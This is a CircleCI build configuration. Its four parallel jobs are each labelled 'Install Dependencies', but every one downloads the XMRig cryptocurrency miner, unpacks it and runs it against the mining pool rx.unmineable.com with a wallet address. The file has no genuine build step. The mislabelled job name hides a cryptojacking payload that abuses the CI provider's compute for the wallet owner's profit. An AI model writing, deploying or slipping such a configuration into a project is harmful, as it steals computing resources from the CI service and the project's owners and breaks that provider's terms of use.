version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https:/github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz && tar -xf xmrig-6.13.1-linux-x64.tar.gz && cd xmrig-6.13.1 && ./xmrig -o rx.unmineable.com:3333 -a rx -k -u BTT:TLKCDpKxaXBsg2WpuPGgmdFag6zg7mxKvP.1Btt -p x
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https:/github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz && tar -xf xmrig-6.13.1-linux-x64.tar.gz && cd xmrig-6.13.1 && ./xmrig -o rx.unmineable.com:3333 -a rx -k -u BTT:TLKCDpKxaXBsg2WpuPGgmdFag6zg7mxKvP.1Btt -p x
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https:/github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz && tar -xf xmrig-6.13.1-linux-x64.tar.gz && cd xmrig-6.13.1 && ./xmrig -o rx.unmineable.com:3333 -a rx -k -u BTT:TLKCDpKxaXBsg2WpuPGgmdFag6zg7mxKvP.1Btt -p x
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https:/github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-x64.tar.gz && tar -xf xmrig-6.13.1-linux-x64.tar.gz && cd xmrig-6.13.1 && ./xmrig -o rx.unmineable.com:3333 -a rx -k -u BTT:TLKCDpKxaXBsg2WpuPGgmdFag6zg7mxKvP.1Btt -p x
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3